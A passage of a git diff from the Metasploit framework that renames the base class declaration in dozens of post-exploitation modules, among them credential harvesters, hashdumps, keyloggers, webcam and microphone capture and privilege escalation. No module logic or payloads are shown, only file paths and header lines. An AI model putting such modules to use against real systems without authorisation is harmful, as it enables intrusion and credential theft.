b/modules/post/multi/gather/run_console_rc_file.rb index 771391e748..dcefb554a0 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index b07ccd6090..578855b1f4 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -11,7 +11,7 @@ require 'csv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index b5746e929e..ceb2ccf86a 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'sshkey' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index bcda33c4ac..00c2fb9c20 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index cdb498623a..c5858ff51f 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/google/geolocation' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 443f40d0b0..33720b0c42 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 0318bda57e..2f3c39248d 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/wall.rb b/modules/post/multi/general/wall.rb index 563ccfe3c3..d9f7b32f6e 100644 --- a/modules/post/multi/general/wall.rb +++ b/modules/post/multi/general/wall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super( update_info( diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index eb8d5f1956..ef965c3053 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index ebc9518926..efed0c9bcf 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index fd93ae6132..69f450a4de 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index b4b18d615c..492d18e8ed 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index bce65e61da..442fc81efc 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index c02a0278dc..af967b3f6f 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index bcc5a44ed6..aa19dd6eb7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Exploit::Powershell include Post::Windows::Powershell diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index afa83fcea1..fdb85616f2 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 7042d04d9f..894d7c538e 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 823c8b71e4..eeb0a2087a 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb @@ -7,7 +7,7 @@ require 'msf/core' include Msf::Auxiliary::Report -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index 2d11de9201..d5438ac54e 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index 2f7e3c1710..f4c01bd106 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -5,7 +5,7 @@ require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/capture/screen.rb b/modules/post/osx/capture/screen.rb index 02ce7c8cdf..467adc9572 100644 --- a/modules/post/osx/capture/screen.rb +++ b/modules/post/osx/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 88546475f6..708cfde81d 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File # extract/verify by by XORing your kcpassword with your password diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index f6b668343a..f498e9dee0 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 3a59f7ae1e..795098850d 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index f572a2d64a..9022522173 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 27197533b5..6e46582d28 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index a4fbe15cc5..93b173aea9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::OSX::System include Msf::Exploit::FileDropper diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index fa87e2c46c..c4d89e9b16 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 4125e961ac..7d169c573a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index 1ba4c2be21..fd0474bd38 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 1763927d2d..26e48f2357 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb index 4db60b33c1..b6751b6d7e 100644 --- a/modules/post/osx/manage/mount_share.rb +++ b/modules/post/osx/manage/mount_share.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored. FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp) diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb index 6cf17e92ed..85f702f928 100644 --- a/modules/post/osx/manage/record_mic.rb +++ b/modules/post/osx/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index cff9656d91..c7d095ba0b 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb index 973e2b24f7..5b8f9be4f1 100644 --- a/modules/post/osx/manage/webcam.rb +++ b/modules/post/osx/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 6a8a049fbe..cf2796a0c7 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 9f3895a9a2..3e7857ba1a 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index cdbd17dd57..322d754938 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index 85e30d43b8..94f85bb769 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index 857ae41b71..6a3afe14fc 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index ba6680db44..2c829a3508 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index 66c0028d56..f77a636064 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index a155bb9166..e7bebe5ad6 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb index 09abdec2b3..8d1dd0b530 100644 --- a/modules/post/windows/escalate/golden_ticket.rb +++ b/modules/post/windows/escalate/golden_ticket.rb @@ -3,7 +3,7 @@ require 'msf/core/post/windows/netapi' require 'msf/core/post/windows/kiwi' require 'msf/core/post/windows/error' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI include Msf::Post::Windows::Accounts include Msf::Post::Windows::Kiwi diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index 928f36fccf..4aadfeb3fe 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index abb3304552..9cfc306460 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index ba5abff56d..101967b452 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index adfafd3529..767fd5660c 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/bitlocker_fvek.rb b/modules/post/windows/gather/bitlocker_fvek.rb index 03406d82a0..a3841f3e74 100644 --- a/modules/post/windows/gather/bitlocker_fvek.rb +++ b/modules/post/windows/gather/bitlocker_fvek.rb @@ -1,6 +1,6 @@ require 'rex/parser/fs/bitlocker' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index f5eebd432c..601de5d6c2 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 51de3c6061..9499d21457 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 20c23ca6c3..4482b6f38a 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index b2be541cdb..2b87c81d3c 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index e58c2a2020..8563952718 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index a90b6d3ac1..c14811d26a 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'metasploit/framework/ntds/parser' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index f1ce358a57..7b57be4c55 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 3a745ee044..cfa9d84987 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index 9a6f9595cc..339e1d204f 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 8d7e09e1f8..68ef4520ac 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7abf8eb39a..fd8df3bf25 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns/resolver' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..a52338efd4 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index efb320bb2d..8fe7912e4b 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index 55c98131a2..b5ab541420 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index 0423d9d277..8fec8928ec 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index ba0bacb968..548591ceed 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 6590172922..ed8e72c93e 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index db8a566a30..b8e60b7d88 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 239eb67dd2..01956553e6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -10,7 +10,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb index 87d870ebc4..8756884945 100644 --- a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb +++ b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 44364a50e4..97714cd53e 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 6658d6c797..bcc7ff14e8 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -9,7 +9,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class 